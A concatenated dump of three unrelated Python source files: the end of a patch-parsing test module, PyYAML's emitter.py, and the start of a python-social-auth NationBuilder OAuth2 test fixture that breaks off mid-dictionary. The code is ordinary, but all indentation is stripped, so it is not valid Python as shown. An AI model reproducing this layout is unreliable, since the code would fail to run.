test_file = self.get_test_loc(u'patch/patches/windows/resolveentity32.patch')
expected_file = self.get_test_loc('patch/patches/windows/resolveentity32.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_sift_patch(self):
test_file = self.get_test_loc(u'patch/patches/windows/sift.patch')
expected_file = self.get_test_loc('patch/patches/windows/sift.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_thumbnail_support_0_patch(self):
test_file = self.get_test_loc(u'patch/patches/windows/thumbnail_support_0.patch')
expected_file = self.get_test_loc('patch/patches/windows/thumbnail_support_0.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_thumbnail_support_0_patch_1(self):
test_file = self.get_test_loc(u'patch/patches/windows/thumbnail_support_0.patch.1')
expected_file = self.get_test_loc('patch/patches/windows/thumbnail_support_0.patch.1.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_webform_3_0_conditional_constructor_0_patch(self):
test_file = self.get_test_loc(u'patch/patches/windows/webform-3.0-conditional_constructor_0.patch')
expected_file = self.get_test_loc('patch/patches/windows/webform-3.0-conditional_constructor_0.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_xml_rpc_addspace_patch(self):
test_file = self.get_test_loc(u'patch/patches/windows/xml_rpc_addSpace.patch')
expected_file = self.get_test_loc('patch/patches/windows/xml_rpc_addSpace.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_xvidcap_1_1_6_docdir_patch(self):
test_file = self.get_test_loc(u'patch/patches/xvidcap-1.1.6-docdir.patch')
expected_file = self.get_test_loc('patch/patches/xvidcap-1.1.6-docdir.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_xvidcap_xorg_patch(self):
test_file = self.get_test_loc(u'patch/patches/xvidcap-xorg.patch')
expected_file = self.get_test_loc('patch/patches/xvidcap-xorg.patch.expected')
check_patch(test_file, expected_file)
| apache-2.0 |
hairmare/php-buildpack | lib/yaml/emitter.py | 387 | 43298 |
# Emitter expects events obeying the following grammar:
# stream ::= STREAM-START document* STREAM-END
# document ::= DOCUMENT-START node DOCUMENT-END
# node ::= SCALAR | sequence | mapping
# sequence ::= SEQUENCE-START node* SEQUENCE-END
# mapping ::= MAPPING-START (node node)* MAPPING-END
__all__ = ['Emitter', 'EmitterError']
from error import YAMLError
from events import *
class EmitterError(YAMLError):
pass
class ScalarAnalysis(object):
def __init__(self, scalar, empty, multiline,
allow_flow_plain, allow_block_plain,
allow_single_quoted, allow_double_quoted,
allow_block):
self.scalar = scalar
self.empty = empty
self.multiline = multiline
self.allow_flow_plain = allow_flow_plain
self.allow_block_plain = allow_block_plain
self.allow_single_quoted = allow_single_quoted
self.allow_double_quoted = allow_double_quoted
self.allow_block = allow_block
class Emitter(object):
DEFAULT_TAG_PREFIXES = {
u'!' : u'!',
u'tag:yaml.org,2002:' : u'!!',
}
def __init__(self, stream, canonical=None, indent=None, width=None,
allow_unicode=None, line_break=None):
# The stream should have the methods `write` and possibly `flush`.
self.stream = stream
# Encoding can be overriden by STREAM-START.
self.encoding = None
# Emitter is a state machine with a stack of states to handle nested
# structures.
self.states = []
self.state = self.expect_stream_start
# Current event and the event queue.
self.events = []
self.event = None
# The current indentation level and the stack of previous indents.
self.indents = []
self.indent = None
# Flow level.
self.flow_level = 0
# Contexts.
self.root_context = False
self.sequence_context = False
self.mapping_context = False
self.simple_key_context = False
# Characteristics of the last emitted character:
# - current position.
# - is it a whitespace?
# - is it an indention character
# (indentation space, '-', '?', or ':')?
self.line = 0
self.column = 0
self.whitespace = True
self.indention = True
# Whether the document requires an explicit document indicator
self.open_ended = False
# Formatting details.
self.canonical = canonical
self.allow_unicode = allow_unicode
self.best_indent = 2
if indent and 1 < indent < 10:
self.best_indent = indent
self.best_width = 80
if width and width > self.best_indent*2:
self.best_width = width
self.best_line_break = u'\n'
if line_break in [u'\r', u'\n', u'\r\n']:
self.best_line_break = line_break
# Tag prefixes.
self.tag_prefixes = None
# Prepared anchor and tag.
self.prepared_anchor = None
self.prepared_tag = None
# Scalar analysis and style.
self.analysis = None
self.style = None
def dispose(self):
# Reset the state attributes (to clear self-references)
self.states = []
self.state = None
def emit(self, event):
self.events.append(event)
while not self.need_more_events():
self.event = self.events.pop(0)
self.state()
self.event = None
# In some cases, we wait for a few next events before emitting.
def need_more_events(self):
if not self.events:
return True
event = self.events[0]
if isinstance(event, DocumentStartEvent):
return self.need_events(1)
elif isinstance(event, SequenceStartEvent):
return self.need_events(2)
elif isinstance(event, MappingStartEvent):
return self.need_events(3)
else:
return False
def need_events(self, count):
level = 0
for event in self.events[1:]:
if isinstance(event, (DocumentStartEvent, CollectionStartEvent)):
level += 1
elif isinstance(event, (DocumentEndEvent, CollectionEndEvent)):
level -= 1
elif isinstance(event, StreamEndEvent):
level = -1
if level < 0:
return False
return (len(self.events) < count+1)
def increase_indent(self, flow=False, indentless=False):
self.indents.append(self.indent)
if self.indent is None:
if flow:
self.indent = self.best_indent
else:
self.indent = 0
elif not indentless:
self.indent += self.best_indent
# States.
# Stream handlers.
def expect_stream_start(self):
if isinstance(self.event, StreamStartEvent):
if self.event.encoding and not getattr(self.stream, 'encoding', None):
self.encoding = self.event.encoding
self.write_stream_start()
self.state = self.expect_first_document_start
else:
raise EmitterError("expected StreamStartEvent, but got %s"
% self.event)
def expect_nothing(self):
raise EmitterError("expected nothing, but got %s" % self.event)
# Document handlers.
def expect_first_document_start(self):
return self.expect_document_start(first=True)
def expect_document_start(self, first=False):
if isinstance(self.event, DocumentStartEvent):
if (self.event.version or self.event.tags) and self.open_ended:
self.write_indicator(u'...', True)
self.write_indent()
if self.event.version:
version_text = self.prepare_version(self.event.version)
self.write_version_directive(version_text)
self.tag_prefixes = self.DEFAULT_TAG_PREFIXES.copy()
if self.event.tags:
handles = self.event.tags.keys()
handles.sort()
for handle in handles:
prefix = self.event.tags[handle]
self.tag_prefixes[prefix] = handle
handle_text = self.prepare_tag_handle(handle)
prefix_text = self.prepare_tag_prefix(prefix)
self.write_tag_directive(handle_text, prefix_text)
implicit = (first and not self.event.explicit and not self.canonical
and not self.event.version and not self.event.tags
and not self.check_empty_document())
if not implicit:
self.write_indent()
self.write_indicator(u'---', True)
if self.canonical:
self.write_indent()
self.state = self.expect_document_root
elif isinstance(self.event, StreamEndEvent):
if self.open_ended:
self.write_indicator(u'...', True)
self.write_indent()
self.write_stream_end()
self.state = self.expect_nothing
else:
raise EmitterError("expected DocumentStartEvent, but got %s"
% self.event)
def expect_document_end(self):
if isinstance(self.event, DocumentEndEvent):
self.write_indent()
if self.event.explicit:
self.write_indicator(u'...', True)
self.write_indent()
self.flush_stream()
self.state = self.expect_document_start
else:
raise EmitterError("expected DocumentEndEvent, but got %s"
% self.event)
def expect_document_root(self):
self.states.append(self.expect_document_end)
self.expect_node(root=True)
# Node handlers.
def expect_node(self, root=False, sequence=False, mapping=False,
simple_key=False):
self.root_context = root
self.sequence_context = sequence
self.mapping_context = mapping
self.simple_key_context = simple_key
if isinstance(self.event, AliasEvent):
self.expect_alias()
elif isinstance(self.event, (ScalarEvent, CollectionStartEvent)):
self.process_anchor(u'&')
self.process_tag()
if isinstance(self.event, ScalarEvent):
self.expect_scalar()
elif isinstance(self.event, SequenceStartEvent):
if self.flow_level or self.canonical or self.event.flow_style \
or self.check_empty_sequence():
self.expect_flow_sequence()
else:
self.expect_block_sequence()
elif isinstance(self.event, MappingStartEvent):
if self.flow_level or self.canonical or self.event.flow_style \
or self.check_empty_mapping():
self.expect_flow_mapping()
else:
self.expect_block_mapping()
else:
raise EmitterError("expected NodeEvent, but got %s" % self.event)
def expect_alias(self):
if self.event.anchor is None:
raise EmitterError("anchor is not specified for alias")
self.process_anchor(u'*')
self.state = self.states.pop()
def expect_scalar(self):
self.increase_indent(flow=True)
self.process_scalar()
self.indent = self.indents.pop()
self.state = self.states.pop()
# Flow sequence handlers.
def expect_flow_sequence(self):
self.write_indicator(u'[', True, whitespace=True)
self.flow_level += 1
self.increase_indent(flow=True)
self.state = self.expect_first_flow_sequence_item
def expect_first_flow_sequence_item(self):
if isinstance(self.event, SequenceEndEvent):
self.indent = self.indents.pop()
self.flow_level -= 1
self.write_indicator(u']', False)
self.state = self.states.pop()
else:
if self.canonical or self.column > self.best_width:
self.write_indent()
self.states.append(self.expect_flow_sequence_item)
self.expect_node(sequence=True)
def expect_flow_sequence_item(self):
if isinstance(self.event, SequenceEndEvent):
self.indent = self.indents.pop()
self.flow_level -= 1
if self.canonical:
self.write_indicator(u',', False)
self.write_indent()
self.write_indicator(u']', False)
self.state = self.states.pop()
else:
self.write_indicator(u',', False)
if self.canonical or self.column > self.best_width:
self.write_indent()
self.states.append(self.expect_flow_sequence_item)
self.expect_node(sequence=True)
# Flow mapping handlers.
def expect_flow_mapping(self):
self.write_indicator(u'{', True, whitespace=True)
self.flow_level += 1
self.increase_indent(flow=True)
self.state = self.expect_first_flow_mapping_key
def expect_first_flow_mapping_key(self):
if isinstance(self.event, MappingEndEvent):
self.indent = self.indents.pop()
self.flow_level -= 1
self.write_indicator(u'}', False)
self.state = self.states.pop()
else:
if self.canonical or self.column > self.best_width:
self.write_indent()
if not self.canonical and self.check_simple_key():
self.states.append(self.expect_flow_mapping_simple_value)
self.expect_node(mapping=True, simple_key=True)
else:
self.write_indicator(u'?', True)
self.states.append(self.expect_flow_mapping_value)
self.expect_node(mapping=True)
def expect_flow_mapping_key(self):
if isinstance(self.event, MappingEndEvent):
self.indent = self.indents.pop()
self.flow_level -= 1
if self.canonical:
self.write_indicator(u',', False)
self.write_indent()
self.write_indicator(u'}', False)
self.state = self.states.pop()
else:
self.write_indicator(u',', False)
if self.canonical or self.column > self.best_width:
self.write_indent()
if not self.canonical and self.check_simple_key():
self.states.append(self.expect_flow_mapping_simple_value)
self.expect_node(mapping=True, simple_key=True)
else:
self.write_indicator(u'?', True)
self.states.append(self.expect_flow_mapping_value)
self.expect_node(mapping=True)
def expect_flow_mapping_simple_value(self):
self.write_indicator(u':', False)
self.states.append(self.expect_flow_mapping_key)
self.expect_node(mapping=True)
def expect_flow_mapping_value(self):
if self.canonical or self.column > self.best_width:
self.write_indent()
self.write_indicator(u':', True)
self.states.append(self.expect_flow_mapping_key)
self.expect_node(mapping=True)
# Block sequence handlers.
def expect_block_sequence(self):
indentless = (self.mapping_context and not self.indention)
self.increase_indent(flow=False, indentless=indentless)
self.state = self.expect_first_block_sequence_item
def expect_first_block_sequence_item(self):
return self.expect_block_sequence_item(first=True)
def expect_block_sequence_item(self, first=False):
if not first and isinstance(self.event, SequenceEndEvent):
self.indent = self.indents.pop()
self.state = self.states.pop()
else:
self.write_indent()
self.write_indicator(u'-', True, indention=True)
self.states.append(self.expect_block_sequence_item)
self.expect_node(sequence=True)
# Block mapping handlers.
def expect_block_mapping(self):
self.increase_indent(flow=False)
self.state = self.expect_first_block_mapping_key
def expect_first_block_mapping_key(self):
return self.expect_block_mapping_key(first=True)
def expect_block_mapping_key(self, first=False):
if not first and isinstance(self.event, MappingEndEvent):
self.indent = self.indents.pop()
self.state = self.states.pop()
else:
self.write_indent()
if self.check_simple_key():
self.states.append(self.expect_block_mapping_simple_value)
self.expect_node(mapping=True, simple_key=True)
else:
self.write_indicator(u'?', True, indention=True)
self.states.append(self.expect_block_mapping_value)
self.expect_node(mapping=True)
def expect_block_mapping_simple_value(self):
self.write_indicator(u':', False)
self.states.append(self.expect_block_mapping_key)
self.expect_node(mapping=True)
def expect_block_mapping_value(self):
self.write_indent()
self.write_indicator(u':', True, indention=True)
self.states.append(self.expect_block_mapping_key)
self.expect_node(mapping=True)
# Checkers.
def check_empty_sequence(self):
return (isinstance(self.event, SequenceStartEvent) and self.events
and isinstance(self.events[0], SequenceEndEvent))
def check_empty_mapping(self):
return (isinstance(self.event, MappingStartEvent) and self.events
and isinstance(self.events[0], MappingEndEvent))
def check_empty_document(self):
if not isinstance(self.event, DocumentStartEvent) or not self.events:
return False
event = self.events[0]
return (isinstance(event, ScalarEvent) and event.anchor is None
and event.tag is None and event.implicit and event.value == u'')
def check_simple_key(self):
length = 0
if isinstance(self.event, NodeEvent) and self.event.anchor is not None:
if self.prepared_anchor is None:
self.prepared_anchor = self.prepare_anchor(self.event.anchor)
length += len(self.prepared_anchor)
if isinstance(self.event, (ScalarEvent, CollectionStartEvent)) \
and self.event.tag is not None:
if self.prepared_tag is None:
self.prepared_tag = self.prepare_tag(self.event.tag)
length += len(self.prepared_tag)
if isinstance(self.event, ScalarEvent):
if self.analysis is None:
self.analysis = self.analyze_scalar(self.event.value)
length += len(self.analysis.scalar)
return (length < 128 and (isinstance(self.event, AliasEvent)
or (isinstance(self.event, ScalarEvent)
and not self.analysis.empty and not self.analysis.multiline)
or self.check_empty_sequence() or self.check_empty_mapping()))
# Anchor, Tag, and Scalar processors.
def process_anchor(self, indicator):
if self.event.anchor is None:
self.prepared_anchor = None
return
if self.prepared_anchor is None:
self.prepared_anchor = self.prepare_anchor(self.event.anchor)
if self.prepared_anchor:
self.write_indicator(indicator+self.prepared_anchor, True)
self.prepared_anchor = None
def process_tag(self):
tag = self.event.tag
if isinstance(self.event, ScalarEvent):
if self.style is None:
self.style = self.choose_scalar_style()
if ((not self.canonical or tag is None) and
((self.style == '' and self.event.implicit[0])
or (self.style != '' and self.event.implicit[1]))):
self.prepared_tag = None
return
if self.event.implicit[0] and tag is None:
tag = u'!'
self.prepared_tag = None
else:
if (not self.canonical or tag is None) and self.event.implicit:
self.prepared_tag = None
return
if tag is None:
raise EmitterError("tag is not specified")
if self.prepared_tag is None:
self.prepared_tag = self.prepare_tag(tag)
if self.prepared_tag:
self.write_indicator(self.prepared_tag, True)
self.prepared_tag = None
def choose_scalar_style(self):
if self.analysis is None:
self.analysis = self.analyze_scalar(self.event.value)
if self.event.style == '"' or self.canonical:
return '"'
if not self.event.style and self.event.implicit[0]:
if (not (self.simple_key_context and
(self.analysis.empty or self.analysis.multiline))
and (self.flow_level and self.analysis.allow_flow_plain
or (not self.flow_level and self.analysis.allow_block_plain))):
return ''
if self.event.style and self.event.style in '|>':
if (not self.flow_level and not self.simple_key_context
and self.analysis.allow_block):
return self.event.style
if not self.event.style or self.event.style == '\'':
if (self.analysis.allow_single_quoted and
not (self.simple_key_context and self.analysis.multiline)):
return '\''
return '"'
def process_scalar(self):
if self.analysis is None:
self.analysis = self.analyze_scalar(self.event.value)
if self.style is None:
self.style = self.choose_scalar_style()
split = (not self.simple_key_context)
#if self.analysis.multiline and split \
# and (not self.style or self.style in '\'\"'):
# self.write_indent()
if self.style == '"':
self.write_double_quoted(self.analysis.scalar, split)
elif self.style == '\'':
self.write_single_quoted(self.analysis.scalar, split)
elif self.style == '>':
self.write_folded(self.analysis.scalar)
elif self.style == '|':
self.write_literal(self.analysis.scalar)
else:
self.write_plain(self.analysis.scalar, split)
self.analysis = None
self.style = None
# Analyzers.
def prepare_version(self, version):
major, minor = version
if major != 1:
raise EmitterError("unsupported YAML version: %d.%d" % (major, minor))
return u'%d.%d' % (major, minor)
def prepare_tag_handle(self, handle):
if not handle:
raise EmitterError("tag handle must not be empty")
if handle[0] != u'!' or handle[-1] != u'!':
raise EmitterError("tag handle must start and end with '!': %r"
% (handle.encode('utf-8')))
for ch in handle[1:-1]:
if not (u'0' <= ch <= u'9' or u'A' <= ch <= u'Z' or u'a' <= ch <= u'z' \
or ch in u'-_'):
raise EmitterError("invalid character %r in the tag handle: %r"
% (ch.encode('utf-8'), handle.encode('utf-8')))
return handle
def prepare_tag_prefix(self, prefix):
if not prefix:
raise EmitterError("tag prefix must not be empty")
chunks = []
start = end = 0
if prefix[0] == u'!':
end = 1
while end < len(prefix):
ch = prefix[end]
if u'0' <= ch <= u'9' or u'A' <= ch <= u'Z' or u'a' <= ch <= u'z' \
or ch in u'-;/?!:@&=+$,_.~*\'()[]':
end += 1
else:
if start < end:
chunks.append(prefix[start:end])
start = end = end+1
data = ch.encode('utf-8')
for ch in data:
chunks.append(u'%%%02X' % ord(ch))
if start < end:
chunks.append(prefix[start:end])
return u''.join(chunks)
def prepare_tag(self, tag):
if not tag:
raise EmitterError("tag must not be empty")
if tag == u'!':
return tag
handle = None
suffix = tag
prefixes = self.tag_prefixes.keys()
prefixes.sort()
for prefix in prefixes:
if tag.startswith(prefix) \
and (prefix == u'!' or len(prefix) < len(tag)):
handle = self.tag_prefixes[prefix]
suffix = tag[len(prefix):]
chunks = []
start = end = 0
while end < len(suffix):
ch = suffix[end]
if u'0' <= ch <= u'9' or u'A' <= ch <= u'Z' or u'a' <= ch <= u'z' \
or ch in u'-;/?:@&=+$,_.~*\'()[]' \
or (ch == u'!' and handle != u'!'):
end += 1
else:
if start < end:
chunks.append(suffix[start:end])
start = end = end+1
data = ch.encode('utf-8')
for ch in data:
chunks.append(u'%%%02X' % ord(ch))
if start < end:
chunks.append(suffix[start:end])
suffix_text = u''.join(chunks)
if handle:
return u'%s%s' % (handle, suffix_text)
else:
return u'!<%s>' % suffix_text
def prepare_anchor(self, anchor):
if not anchor:
raise EmitterError("anchor must not be empty")
for ch in anchor:
if not (u'0' <= ch <= u'9' or u'A' <= ch <= u'Z' or u'a' <= ch <= u'z' \
or ch in u'-_'):
raise EmitterError("invalid character %r in the anchor: %r"
% (ch.encode('utf-8'), anchor.encode('utf-8')))
return anchor
def analyze_scalar(self, scalar):
# Empty scalar is a special case.
if not scalar:
return ScalarAnalysis(scalar=scalar, empty=True, multiline=False,
allow_flow_plain=False, allow_block_plain=True,
allow_single_quoted=True, allow_double_quoted=True,
allow_block=False)
# Indicators and special characters.
block_indicators = False
flow_indicators = False
line_breaks = False
special_characters = False
# Important whitespace combinations.
leading_space = False
leading_break = False
trailing_space = False
trailing_break = False
break_space = False
space_break = False
# Check document indicators.
if scalar.startswith(u'---') or scalar.startswith(u'...'):
block_indicators = True
flow_indicators = True
# First character or preceded by a whitespace.
preceeded_by_whitespace = True
# Last character or followed by a whitespace.
followed_by_whitespace = (len(scalar) == 1 or
scalar[1] in u'\0 \t\r\n\x85\u2028\u2029')
# The previous character is a space.
previous_space = False
# The previous character is a break.
previous_break = False
index = 0
while index < len(scalar):
ch = scalar[index]
# Check for indicators.
if index == 0:
# Leading indicators are special characters.
if ch in u'#,[]{}&*!|>\'\"%@`':
flow_indicators = True
block_indicators = True
if ch in u'?:':
flow_indicators = True
if followed_by_whitespace:
block_indicators = True
if ch == u'-' and followed_by_whitespace:
flow_indicators = True
block_indicators = True
else:
# Some indicators cannot appear within a scalar as well.
if ch in u',?[]{}':
flow_indicators = True
if ch == u':':
flow_indicators = True
if followed_by_whitespace:
block_indicators = True
if ch == u'#' and preceeded_by_whitespace:
flow_indicators = True
block_indicators = True
# Check for line breaks, special, and unicode characters.
if ch in u'\n\x85\u2028\u2029':
line_breaks = True
if not (ch == u'\n' or u'\x20' <= ch <= u'\x7E'):
if (ch == u'\x85' or u'\xA0' <= ch <= u'\uD7FF'
or u'\uE000' <= ch <= u'\uFFFD') and ch != u'\uFEFF':
unicode_characters = True
if not self.allow_unicode:
special_characters = True
else:
special_characters = True
# Detect important whitespace combinations.
if ch == u' ':
if index == 0:
leading_space = True
if index == len(scalar)-1:
trailing_space = True
if previous_break:
break_space = True
previous_space = True
previous_break = False
elif ch in u'\n\x85\u2028\u2029':
if index == 0:
leading_break = True
if index == len(scalar)-1:
trailing_break = True
if previous_space:
space_break = True
previous_space = False
previous_break = True
else:
previous_space = False
previous_break = False
# Prepare for the next character.
index += 1
preceeded_by_whitespace = (ch in u'\0 \t\r\n\x85\u2028\u2029')
followed_by_whitespace = (index+1 >= len(scalar) or
scalar[index+1] in u'\0 \t\r\n\x85\u2028\u2029')
# Let's decide what styles are allowed.
allow_flow_plain = True
allow_block_plain = True
allow_single_quoted = True
allow_double_quoted = True
allow_block = True
# Leading and trailing whitespaces are bad for plain scalars.
if (leading_space or leading_break
or trailing_space or trailing_break):
allow_flow_plain = allow_block_plain = False
# We do not permit trailing spaces for block scalars.
if trailing_space:
allow_block = False
# Spaces at the beginning of a new line are only acceptable for block
# scalars.
if break_space:
allow_flow_plain = allow_block_plain = allow_single_quoted = False
# Spaces followed by breaks, as well as special character are only
# allowed for double quoted scalars.
if space_break or special_characters:
allow_flow_plain = allow_block_plain = \
allow_single_quoted = allow_block = False
# Although the plain scalar writer supports breaks, we never emit
# multiline plain scalars.
if line_breaks:
allow_flow_plain = allow_block_plain = False
# Flow indicators are forbidden for flow plain scalars.
if flow_indicators:
allow_flow_plain = False
# Block indicators are forbidden for block plain scalars.
if block_indicators:
allow_block_plain = False
return ScalarAnalysis(scalar=scalar,
empty=False, multiline=line_breaks,
allow_flow_plain=allow_flow_plain,
allow_block_plain=allow_block_plain,
allow_single_quoted=allow_single_quoted,
allow_double_quoted=allow_double_quoted,
allow_block=allow_block)
# Writers.
def flush_stream(self):
if hasattr(self.stream, 'flush'):
self.stream.flush()
def write_stream_start(self):
# Write BOM if needed.
if self.encoding and self.encoding.startswith('utf-16'):
self.stream.write(u'\uFEFF'.encode(self.encoding))
def write_stream_end(self):
self.flush_stream()
def write_indicator(self, indicator, need_whitespace,
whitespace=False, indention=False):
if self.whitespace or not need_whitespace:
data = indicator
else:
data = u' '+indicator
self.whitespace = whitespace
self.indention = self.indention and indention
self.column += len(data)
self.open_ended = False
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
def write_indent(self):
indent = self.indent or 0
if not self.indention or self.column > indent \
or (self.column == indent and not self.whitespace):
self.write_line_break()
if self.column < indent:
self.whitespace = True
data = u' '*(indent-self.column)
self.column = indent
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
def write_line_break(self, data=None):
if data is None:
data = self.best_line_break
self.whitespace = True
self.indention = True
self.line += 1
self.column = 0
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
def write_version_directive(self, version_text):
data = u'%%YAML %s' % version_text
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
self.write_line_break()
def write_tag_directive(self, handle_text, prefix_text):
data = u'%%TAG %s %s' % (handle_text, prefix_text)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
self.write_line_break()
# Scalar streams.
def write_single_quoted(self, text, split=True):
self.write_indicator(u'\'', True)
spaces = False
breaks = False
start = end = 0
while end <= len(text):
ch = None
if end < len(text):
ch = text[end]
if spaces:
if ch is None or ch != u' ':
if start+1 == end and self.column > self.best_width and split \
and start != 0 and end != len(text):
self.write_indent()
else:
data = text[start:end]
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
start = end
elif breaks:
if ch is None or ch not in u'\n\x85\u2028\u2029':
if text[start] == u'\n':
self.write_line_break()
for br in text[start:end]:
if br == u'\n':
self.write_line_break()
else:
self.write_line_break(br)
self.write_indent()
start = end
else:
if ch is None or ch in u' \n\x85\u2028\u2029' or ch == u'\'':
if start < end:
data = text[start:end]
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
start = end
if ch == u'\'':
data = u'\'\''
self.column += 2
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
start = end + 1
if ch is not None:
spaces = (ch == u' ')
breaks = (ch in u'\n\x85\u2028\u2029')
end += 1
self.write_indicator(u'\'', False)
ESCAPE_REPLACEMENTS = {
u'\0': u'0',
u'\x07': u'a',
u'\x08': u'b',
u'\x09': u't',
u'\x0A': u'n',
u'\x0B': u'v',
u'\x0C': u'f',
u'\x0D': u'r',
u'\x1B': u'e',
u'\"': u'\"',
u'\\': u'\\',
u'\x85': u'N',
u'\xA0': u'_',
u'\u2028': u'L',
u'\u2029': u'P',
}
def write_double_quoted(self, text, split=True):
self.write_indicator(u'"', True)
start = end = 0
while end <= len(text):
ch = None
if end < len(text):
ch = text[end]
if ch is None or ch in u'"\\\x85\u2028\u2029\uFEFF' \
or not (u'\x20' <= ch <= u'\x7E'
or (self.allow_unicode
and (u'\xA0' <= ch <= u'\uD7FF'
or u'\uE000' <= ch <= u'\uFFFD'))):
if start < end:
data = text[start:end]
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
start = end
if ch is not None:
if ch in self.ESCAPE_REPLACEMENTS:
data = u'\\'+self.ESCAPE_REPLACEMENTS[ch]
elif ch <= u'\xFF':
data = u'\\x%02X' % ord(ch)
elif ch <= u'\uFFFF':
data = u'\\u%04X' % ord(ch)
else:
data = u'\\U%08X' % ord(ch)
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
start = end+1
if 0 < end < len(text)-1 and (ch == u' ' or start >= end) \
and self.column+(end-start) > self.best_width and split:
data = text[start:end]+u'\\'
if start < end:
start = end
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
self.write_indent()
self.whitespace = False
self.indention = False
if text[start] == u' ':
data = u'\\'
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
end += 1
self.write_indicator(u'"', False)
def determine_block_hints(self, text):
hints = u''
if text:
if text[0] in u' \n\x85\u2028\u2029':
hints += unicode(self.best_indent)
if text[-1] not in u'\n\x85\u2028\u2029':
hints += u'-'
elif len(text) == 1 or text[-2] in u'\n\x85\u2028\u2029':
hints += u'+'
return hints
def write_folded(self, text):
hints = self.determine_block_hints(text)
self.write_indicator(u'>'+hints, True)
if hints[-1:] == u'+':
self.open_ended = True
self.write_line_break()
leading_space = True
spaces = False
breaks = True
start = end = 0
while end <= len(text):
ch = None
if end < len(text):
ch = text[end]
if breaks:
if ch is None or ch not in u'\n\x85\u2028\u2029':
if not leading_space and ch is not None and ch != u' ' \
and text[start] == u'\n':
self.write_line_break()
leading_space = (ch == u' ')
for br in text[start:end]:
if br == u'\n':
self.write_line_break()
else:
self.write_line_break(br)
if ch is not None:
self.write_indent()
start = end
elif spaces:
if ch != u' ':
if start+1 == end and self.column > self.best_width:
self.write_indent()
else:
data = text[start:end]
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
start = end
else:
if ch is None or ch in u' \n\x85\u2028\u2029':
data = text[start:end]
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
if ch is None:
self.write_line_break()
start = end
if ch is not None:
breaks = (ch in u'\n\x85\u2028\u2029')
spaces = (ch == u' ')
end += 1
def write_literal(self, text):
hints = self.determine_block_hints(text)
self.write_indicator(u'|'+hints, True)
if hints[-1:] == u'+':
self.open_ended = True
self.write_line_break()
breaks = True
start = end = 0
while end <= len(text):
ch = None
if end < len(text):
ch = text[end]
if breaks:
if ch is None or ch not in u'\n\x85\u2028\u2029':
for br in text[start:end]:
if br == u'\n':
self.write_line_break()
else:
self.write_line_break(br)
if ch is not None:
self.write_indent()
start = end
else:
if ch is None or ch in u'\n\x85\u2028\u2029':
data = text[start:end]
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
if ch is None:
self.write_line_break()
start = end
if ch is not None:
breaks = (ch in u'\n\x85\u2028\u2029')
end += 1
def write_plain(self, text, split=True):
if self.root_context:
self.open_ended = True
if not text:
return
if not self.whitespace:
data = u' '
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
self.whitespace = False
self.indention = False
spaces = False
breaks = False
start = end = 0
while end <= len(text):
ch = None
if end < len(text):
ch = text[end]
if spaces:
if ch != u' ':
if start+1 == end and self.column > self.best_width and split:
self.write_indent()
self.whitespace = False
self.indention = False
else:
data = text[start:end]
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
start = end
elif breaks:
if ch not in u'\n\x85\u2028\u2029':
if text[start] == u'\n':
self.write_line_break()
for br in text[start:end]:
if br == u'\n':
self.write_line_break()
else:
self.write_line_break(br)
self.write_indent()
self.whitespace = False
self.indention = False
start = end
else:
if ch is None or ch in u' \n\x85\u2028\u2029':
data = text[start:end]
self.column += len(data)
if self.encoding:
data = data.encode(self.encoding)
self.stream.write(data)
start = end
if ch is not None:
spaces = (ch == u' ')
breaks = (ch in u'\n\x85\u2028\u2029')
end += 1
| apache-2.0 |
ononeor12/python-social-auth | social/tests/backends/test_nationbuilder.py | 77 | 8489 | import json
from social.tests.backends.oauth import OAuth2Test
class NationBuilderOAuth2Test(OAuth2Test):
backend_path = 'social.backends.nationbuilder.NationBuilderOAuth2'
user_data_url = 'https://foobar.nationbuilder.com/api/v1/people/me'
expected_username = 'foobar'
access_token_body = json.dumps({
'access_token': 'foobar',
'token_type': 'bearer',
'created_at': 1422937981,
'expires_in': 2592000
})
user_data_body = json.dumps({
'person': {
'twitter_followers_count': None,
'last_name': 'Bar',
'rule_violations_count': 0,
'linkedin_id': None,
'recruiter_id': None,
'membership_expires_at': None,
'donations_raised_count': 0,
'last_contacted_at': None,
'prefix': None,
'profile_content_html': None,
'email4': None,
'email2': None,
'availability': None,
'occupation': None,
'user_submitted_address': None,
'could_vote_status': None,
'state_upper_district': None,
'salesforce_id': None,
'van_id': None,
'phone_time': None,
'profile_content': None,
'auto_import_id': None,
'parent_id': None,
'email4_is_bad': False,
'twitter_updated_at': None,
'email3_is_bad': False,
'bio': None,
'party_member': None,
'unsubscribed_at': None,
'fax_number': None,
'last_contacted_by': None,
'active_customer_expires_at': None,
'federal_donotcall': False,
'warnings_count': 0,
'first_supporter_at': '2015-02-02T19:30:28-08:00',
'previous_party': None,
'donations_raised_amount_this_cycle_in_cents': 0,
'call_status_name': None,
'marital_status': None,
'facebook_updated_at': None,
'donations_count': 0,
'note_updated_at': None,
'closed_invoices_count': None,
'profile_headline': None,
'fire_district': None,
'mobile_normalized': None,
'import_id': None,
'last_call_id': None,
'donations_raised_amount_in_cents': 0,
'facebook_address': None,
'is_profile_private': False,
